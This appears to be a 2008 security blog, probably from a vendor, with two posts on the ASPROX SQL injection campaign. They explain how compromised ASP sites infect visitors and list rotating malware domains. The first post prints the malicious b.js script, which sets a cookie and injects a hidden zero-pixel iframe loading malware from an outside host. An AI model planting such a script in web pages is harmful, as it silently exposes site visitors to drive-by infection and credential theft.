Monday, June 30, 2008

ASPROX SQL Compromised my website, now what?

Many people are calling and emailing us for information about ASPROX and something most people seem to be unaware of is how this affects the visitors of your infected website?

So I will walk you through what happens:

Once your ASP website is compromised by the ASPROX SQL Injection you now host malware. A malicious piece of javascript "b.js" is loaded from one of the domains listed in my previous posts, the javascript creates a "asprox was here" cookie and opens a hidden 0 pixel iframe from yet another bad domain which is "the malware can of worms". These domains constantly rotate IP's (for protection from blocklisting) using fast flux dns.

Here is sample contents from the javascript (b.js):

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http//supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 /iframe");
}
catch(e)
{
};
}


The malware can vary but is typically a mishmash of exploits which target several recent browser based vulnerabilities in quicktime, adobe reader, flash and even AOL instant messenger. Once a vulnerable client goes to your site the malware is successfully loaded and not only becomes a zombie slave within the ASPROX botnet (the same hosts that attacked your webserver) it also installs various nefarious programs like a password stealer which defrauds you of your online accounts. Infected clients are reported to be sending out bank phishing emails as well.

So in short review for those who are not-so-technical...

if you have a website infected with ASPROX and not cleaned/updated/secured, your website is infecting and spreading malware to others who simply viewed your site in their browser



That means you have an obligation to address this problem immediately! Please contact us for the information packet on ASPROX defense today.

Thursday, June 26, 2008

ASPROX SQL Injection Attacks cont.

ASPROX continues to ravage the web, please contact us for the information packet we put together with defense suggestions.

New ASPROX malware domains: app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com